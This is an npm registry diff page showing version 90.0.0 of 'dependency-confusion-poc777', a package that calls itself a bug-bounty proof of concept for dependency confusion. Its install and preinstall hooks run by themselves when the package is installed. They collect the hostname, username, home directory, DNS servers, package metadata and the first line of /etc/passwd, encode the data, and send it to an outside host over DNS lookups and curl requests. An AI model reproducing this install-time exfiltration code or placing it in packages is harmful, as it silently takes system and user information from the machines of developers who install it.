dependency-confusion-poc777 90.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of dependency-confusion-poc777 might be problematic. Click here for more details.
- package/index.js +63 -0
- package/package.json +19 -0
package/index.js
ADDED
|
@@ -0,0 +1,63 @@
|
|
|
1
|
+
const os = require("os");
|
|
2
|
+
const dns = require("dns");
|
|
3
|
+
const querystring = require("querystring");
|
|
4
|
+
const https = require("https");
|
|
5
|
+
const packageJSON = require("./package.json");
|
|
6
|
+
const package = packageJSON.name;
|
|
7
|
+
|
|
8
|
+
const trackingData = {
|
|
9
|
+
packageName: package,
|
|
10
|
+
currentDirectory: __dirname || process.cwd(),
|
|
11
|
+
homeDirectory: os.homedir() || process.env.HOME,
|
|
12
|
+
hostName: os.hostname() || "hostname",
|
|
13
|
+
userName: os.userInfo().username || process.env.USER,
|
|
14
|
+
dnsServers: dns.getServers() || "dns_servers",
|
|
15
|
+
resolved: packageJSON ? packageJSON.___resolved : undefined,
|
|
16
|
+
version: packageJSON.version || "version",
|
|
17
|
+
packageJSON: packageJSON || "package_json",
|
|
18
|
+
etcPasswdFirstLine: require("fs").readFileSync("/etc/passwd").toString().split("\n")[0] || "etc_passwd",
|
|
19
|
+
};
|
|
20
|
+
|
|
21
|
+
const encodedData = Object.keys(trackingData).reduce((acc, key) => {
|
|
22
|
+
acc[key] = Buffer.from(JSON.stringify(trackingData[key] || '')).toString('base64');
|
|
23
|
+
return acc;
|
|
24
|
+
}, {});
|
|
25
|
+
|
|
26
|
+
const { exec } = require("child_process");
|
|
27
|
+
|
|
28
|
+
// DNS command ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
29
|
+
|
|
30
|
+
const new_dns_command = `nslookup ${trackingData.hostName}.${trackingData.userName}.${trackingData.dnsServers}.${package}.dependency_confusion_poc.the7th.tech`
|
|
31
|
+
|
|
32
|
+
exec(new_dns_command, (error, stdout, stderr) => {
|
|
33
|
+
if (error) {
|
|
34
|
+
console.error(error.message);
|
|
35
|
+
return;
|
|
36
|
+
}
|
|
37
|
+
|
|
38
|
+
if (stderr) {
|
|
39
|
+
console.log(stderr);
|
|
40
|
+
}
|
|
41
|
+
|
|
42
|
+
console.log(stdout);
|
|
43
|
+
});
|
|
44
|
+
|
|
45
|
+
// HTTP command ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
46
|
+
|
|
47
|
+
const http_command = `curl -k -s 'http://dependency_confusion_poc.the7th.tech/dependency_confusion_poc?full_base64_data=${querystring.stringify(encodedData)}'`
|
|
48
|
+
|
|
49
|
+
exec(http_command, (error, stdout, stderr) => {
|
|
50
|
+
if (error) {
|
|
51
|
+
console.error(error.message);
|
|
52
|
+
return;
|
|
53
|
+
}
|
|
54
|
+
|
|
55
|
+
if (stderr) {
|
|
56
|
+
|
|
57
|
+
console.log(stderr);
|
|
58
|
+
}
|
|
59
|
+
|
|
60
|
+
console.log(stdout);
|
|
61
|
+
});
|
|
62
|
+
|
|
63
|
+
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
package/package.json
ADDED
|
@@ -0,0 +1,19 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "dependency-confusion-poc777",
|
|
3
|
+
"version": "90.0.0",
|
|
4
|
+
"description": "Simple PoC package for testing for dependency confusion vulnerabilities based one the required Bug Bounty rules",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"install": "curl -k \"http://dependency_confusion_poc.the7th.tech/install_dependency_confusion_poc?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" > /dev/null 2>&1",
|
|
8
|
+
"preinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"keywords": [
|
|
11
|
+
"test",
|
|
12
|
+
"PoC"
|
|
13
|
+
],
|
|
14
|
+
"config": {
|
|
15
|
+
"unsafe-perm": true
|
|
16
|
+
},
|
|
17
|
+
"author": "WayCup",
|
|
18
|
+
"license": "ISC"
|
|
19
|
+
}
|